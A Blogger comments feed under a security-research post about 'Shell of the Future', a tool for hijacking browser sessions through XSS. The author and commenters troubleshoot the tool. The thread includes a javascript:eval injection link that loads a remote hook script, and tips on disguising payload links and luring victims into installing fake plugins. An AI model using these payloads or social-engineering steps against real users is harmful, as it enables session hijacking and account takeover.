tag:blogger.com,1999:blog-3855375622571068952.post6566334242623519084..comments2024-01-24T01:16:14.778-08:00Comments on Attack and Defense Labs: Shell of the Future – Reverse Web Shell Handler for XSS Exploitation.http://www.blogger.com/profile/15085653727055105783noreply@blogger.comBlogger37125tag:blogger.com,1999:blog-3855375622571068952.post-6485297740100614052013-07-15T02:37:37.075-07:002013-07-15T02:37:37.075-07:00i know this is kinda off topic but im having probl...i know this is kinda off topic but im having problems with xss shell, the commands are not working. I have already upload it to 3 hosting sites and still no luck on executing the commands.hey admin ! This tool very slow pls update thread codes needKawartha Answershttp://www.kleventdesign.ca/answers/noreply@blogger.comtag:blogger.com,1999:blog-3855375622571068952.post-60776163711175902812012-01-14T07:45:04.772-08:002012-01-14T07:45:04.772-08:00Is there a solution for this malware on the site? ...Is there a solution for this malware on the site? An infection on the Linux server, where we're constantly in the Wordpress script generates files of type wb 5433712.php antimalware program is a malware called Backdoor.PHP.WebShell! E2<br />The worst thing is that this malware also creates. Htaccess file which redirected to sites infected and compromised the Russian site.<br />Is there a solution?Web izradahttp://www.swebdizajn.comnoreply@blogger.comtag:blogger.com,1999:blog-3855375622571068952.post-28889338106545001252011-10-10T02:21:50.552-07:002011-10-10T02:21:50.552-07:00@lava
Yup I've tried beef already and I was am...@lava<br />Yup I've tried beef already and I was amaze on its capabilities however it is only limited to a single session only, the attack won't work if the victim clicks another page.. hmmmm but I got an idea to bypass this somehow. I'll try your script above and replace with BeEF's hook.js hahaha...Anonymousnoreply@blogger.comtag:blogger.com,1999:blog-3855375622571068952.post-18966665909775021412011-10-09T07:32:18.587-07:002011-10-09T07:32:18.587-07:00@anon
Thanks, that's a good suggestion, howeve...@anon<br />Thanks, that's a good suggestion, however I plan to keep this specifically for 'Reverse Browsing Shell' alone.<br />I would recommend taking a look at the latest version of BeEF - https://code.google.com/p/beef/<br />It has many powerful features including the one you mentioned. Hope this helps!lavahttp://www.andlabs.orgnoreply@blogger.comtag:blogger.com,1999:blog-3855375622571068952.post-76247664151164676442011-10-09T01:56:28.586-07:002011-10-09T01:56:28.586-07:00Hi lava! Thanks for creating this wonderful tool, ...Hi lava! Thanks for creating this wonderful tool, but it would be great if you could add some commands on like alert messages like the ones on xss shell by ferruh.. i know this is kinda off topic but im having problems with xss shell, the commands are not working. I have already upload it to 3 hosting sites and still no luck on executing the commands.Anonymousnoreply@blogger.comtag:blogger.com,1999:blog-3855375622571068952.post-38541735009071596912011-05-04T10:13:32.006-07:002011-05-04T10:13:32.006-07:00@anon
The slowness is not due to threading issues ...@anon<br />The slowness is not due to threading issues but due to the nature of the technique used.<br />Please refer to points 4 & 5 on the FAQ - http://www.andlabs.org/tools/sotf/sotf.html#faqlavahttp://www.andlabs.orgnoreply@blogger.comtag:blogger.com,1999:blog-3855375622571068952.post-86374929654230518772011-05-04T03:35:08.050-07:002011-05-04T03:35:08.050-07:00hey admin ! This tool very slow pls update thread ...hey admin ! This tool very slow pls update thread codes needAnonymousnoreply@blogger.comtag:blogger.com,1999:blog-3855375622571068952.post-83441173279509245342011-02-25T12:49:25.066-08:002011-02-25T12:49:25.066-08:00Its for the attacker's browser so that he can ...Its for the attacker's browser so that he can add a banner or something to the victim's session when browsing from his machine. Makes for a better PoC.<br />If you want to make changes to the victim's browser then you would have to add that code to the JS exploit that gets injected in to the victim's browser.lavahttp://www.andlabs.orgnoreply@blogger.comtag:blogger.com,1999:blog-3855375622571068952.post-16434848931231151402011-02-25T12:31:31.858-08:002011-02-25T12:31:31.858-08:00the match and replace is it for the victim or the ...the match and replace is it for the victim or the attackerAnonymousnoreply@blogger.comtag:blogger.com,1999:blog-3855375622571068952.post-53917140916308054972011-02-25T12:06:37.595-08:002011-02-25T12:06:37.595-08:00no Roni, thats now how it works. The victim does n...no Roni, thats now how it works. The victim does not use Shell of the Future as a proxy. The attacker configures his browser to use it as proxy.<br />The victim only talks to the server component. You must inject your script in to the victim's browser using XSS or from the url bar.lavahttp://www.andlabs.orgnoreply@blogger.comtag:blogger.com,1999:blog-3855375622571068952.post-27947951903698993802011-02-25T11:10:18.269-08:002011-02-25T11:10:18.269-08:00hi lava thanx for the fast replay
let me try to ex...hi lava thanx for the fast replay<br />let me try to explain again what i am trying to do:<br />i want the victim to use your server+proxy as a proxy and then when he connect to it to take a new page from www.yahoo.com for example => i will replace /script/ with your script.<br /><br />is it possible ?<br />cause from what i understood you are working as a full proxy to the victim <br /><br />thanx again roniAnonymousnoreply@blogger.comtag:blogger.com,1999:blog-3855375622571068952.post-67222201013577896832011-02-25T09:47:17.560-08:002011-02-25T09:47:17.560-08:00@roni
the proxy-only mode would work when the serv...@roni<br />the proxy-only mode would work when the server component is hosted separately, in an external web server.<br />if you are running it locally then select the 'server+proxy' mode which is default.<br />the victim talks with the server and since you were not running the server, the victim didnt get any response.<br />hope this helps.lavahttp://www.andlabs.orgnoreply@blogger.comtag:blogger.com,1999:blog-3855375622571068952.post-74781415064105907182011-02-25T06:18:41.737-08:002011-02-25T06:18:41.737-08:00hello
i have tried to work with the program as a...hello <br /><br />i have tried to work with the program as a proxy only. <br />and for some reason it doesn't work.<br />i have tried to work with a victim passing through the proxy and then replace is title with something else with no success ,on the victim i didn't got any response. <br />am i doing something wrong or the proxy has a problemRoni Bacharhttp://ronibachar.blogspot.comnoreply@blogger.comtag:blogger.com,1999:blog-3855375622571068952.post-19178249382381342022010-09-19T03:44:05.061-07:002010-09-19T03:44:05.061-07:00@dinhcaohack
How do you want the binary to be deli...@dinhcaohack<br />How do you want the binary to be delivered, prompt the user for download or by exploiting a browser vulnerability?<br />I am trying to keep this specific to proxying for now.<br />The next version of BeEF (http://code.google.com/p/beef/) would probably be able do that. Keep an eye on that project, lots of interesting things going on there :)lavahttp://www.andlabs.orgnoreply@blogger.comtag:blogger.com,1999:blog-3855375622571068952.post-5055479344630127722010-09-18T12:09:22.765-07:002010-09-18T12:09:22.765-07:00Do you hava any idea to spread a binary file throu...Do you hava any idea to spread a binary file through this XSS Shell :Ddinhcaohackhttp://vniss.netnoreply@blogger.comtag:blogger.com,1999:blog-3855375622571068952.post-54073818044160413712010-09-10T10:35:56.016-07:002010-09-10T10:35:56.016-07:00You sure can Soroush.
I realize that I didnt speci...You sure can Soroush.<br />I realize that I didnt specify any license, was a little lazy to do that :D. You can do whatever you want with that code, full rights!<br />If possible it would be nice if you could share your module with others as well. I could probably add it in the next version.lavahttp://www.andlabs.orgnoreply@blogger.comtag:blogger.com,1999:blog-3855375622571068952.post-67370770037069333382010-09-10T06:55:29.900-07:002010-09-10T06:55:29.900-07:00Sorry if I’m a bit late.
I’m trying to create a go...Sorry if I’m a bit late.<br />I’m trying to create a good presentation for XSS attack. After XSS tunneling, I’ve tried your application. It seems very interesting for PoCs (not for exploitation by malicious attackers).<br />I want to add some codes to your application. However, I’m not sure if you allow others to do that as you did not say anything about the license. Could you please tell me if I can modify your codes for my needs? Can I add new modules to it?Soroush Dalilihttp://soroush.secproject.com/blog/noreply@blogger.comtag:blogger.com,1999:blog-3855375622571068952.post-25511730182598862472010-09-08T04:04:45.661-07:002010-09-08T04:04:45.661-07:00@anon
The effect is specific to the site containin...@anon<br />The effect is specific to the site containing the XSS vulnerability unless we are looking at an Universal XSS browser bug.<br /><br />However with cross-domain resource usage and interdependence on the raise, one vulnerable site could indirectly render others vulnerable as well.<br /><br />A smart attacker would piggyback on the trust the user places on the vulnerable site to obtain further access. dev.twitter.com is currently vulnerable to XSS. An attacker can exploit this vulnerability to display a fake message to the victim asking them to install a new browser plug-in from Twitter.com. Since the user trusts Twitter.com he is going to install this plugin giving the attacker complete control over his browser.lavahttp://www.andlabs.orgnoreply@blogger.comtag:blogger.com,1999:blog-3855375622571068952.post-80360265238897848402010-09-07T19:15:51.009-07:002010-09-07T19:15:51.009-07:00@lava
I'll admit that you make some excellent ...@lava<br />I'll admit that you make some excellent points, lava.<br />Curious, does this shell exploit user session info for only the target site or all of the user's traffic?Anonymousnoreply@blogger.comtag:blogger.com,1999:blog-3855375622571068952.post-67878583194000345562010-09-06T23:55:21.904-07:002010-09-06T23:55:21.904-07:00@anon
The link is not really a problem, it can be ...@anon<br />The link is not really a problem, it can be encoded to look harmless. Moreover the payload does not even have to be a part of the link, it can be inside a page which would load the URL with the payload automatically.<br /><br />If an attacker is only interested in accessing the victim's account on a site then exploiting an XSS on that site is all he needs.<br /><br />Unless you are looking at running a botnet or gaining complete system access, installing a RAT is an unnecessary overkill and you also run the risk of being picked up by AVs.<br /><br />Needless to say that these days people store more information online than they do on their local hard drive.lavahttp://www.andlabs.orgnoreply@blogger.comtag:blogger.com,1999:blog-3855375622571068952.post-72048310025537929902010-09-06T16:44:32.484-07:002010-09-06T16:44:32.484-07:00Client side XSS is not a serious problem. Only an ...Client side XSS is not a serious problem. Only an idiot would click on a link that looks like this<br />http://www.site.comjavascript:eval("s=document.createElement('script');s.src='http://127.0.0.1/e1.js';document.getElementsByTagName('head')[0].appendChild(s)")<br /><br />I mean seriously, if you're going to get them to click on a link, make it a less conspicuous one that gives them a java driveby RAT, which is far more serious than this shell.Anonymousnoreply@blogger.comtag:blogger.com,1999:blog-3855375622571068952.post-41450280870847889952010-08-12T11:32:32.112-07:002010-08-12T11:32:32.112-07:00@anon
Am glad you are trying out the tool.
From w...@anon<br /><br />Am glad you are trying out the tool.<br />From what I understand you are able to hijack the session but the hijacked session does not display a banner like it should.<br />The reason this could be happening is because the URL ends with '.html' or some other extension which is part of the 'direct fetch' white-list. So Shell of the Future is fetching this page directly from the server instead of routing it through the victim.<br /><br />If this is the case then make suitable changes to the direct-fetch configuration and it should work.<br /><br />The 'Hijack Session' link is meant to be the way you explained. When you click the link Shell of the Future sets the victim ID in a cookie and starts tunneling your session.<br /><br />Hopefully this should resolve the issue, please let me know if it doesn't.lavahttp://www.andlabs.orgnoreply@blogger.comtag:blogger.com,1999:blog-3855375622571068952.post-61491313266441353572010-08-12T09:08:51.257-07:002010-08-12T09:08:51.257-07:00Hi,
I have a small issue with the tool, I'd be...Hi,<br />I have a small issue with the tool, I'd be happy if you could help me out. I get the JS script properly loaded and logged into the Sotfconsole, however clicking the link just brings me to the website, no banner, no control.<br /><br />The link "Hijack Session" is just a blank link to the XSSed website with the parameter&ShelloftheFuture_victimID=1<br /><br />Kind of puzzled right now, thanks for any helpAnonymousnoreply@blogger.comtag:blogger.com,1999:blog-3855375622571068952.post-81142375814085920102010-08-04T11:54:11.965-07:002010-08-04T11:54:11.965-07:00@pat
That happens in Firefox, adding a new element...@pat<br />That happens in Firefox, adding a new element to the DOM from the URL bar does not seem to work. Try it in Chrome, it works perfectly.lavahttp://www.andlabs.orgnoreply@blogger.comtag:blogger.com,1999:blog-3855375622571068952.post-22839459129464482692010-08-04T02:30:20.972-07:002010-08-04T02:30:20.972-07:00hi!
When I try to inject the javascript.eval... ...hi! <br /><br />When I try to inject the javascript.eval... into a browser it results in a blank page with "[object HTMLScriptElement]" <br />Don't know why this is happening... but i managed to hijack the session just using the script src version. <br /><br />/patAnonymousnoreply@blogger.com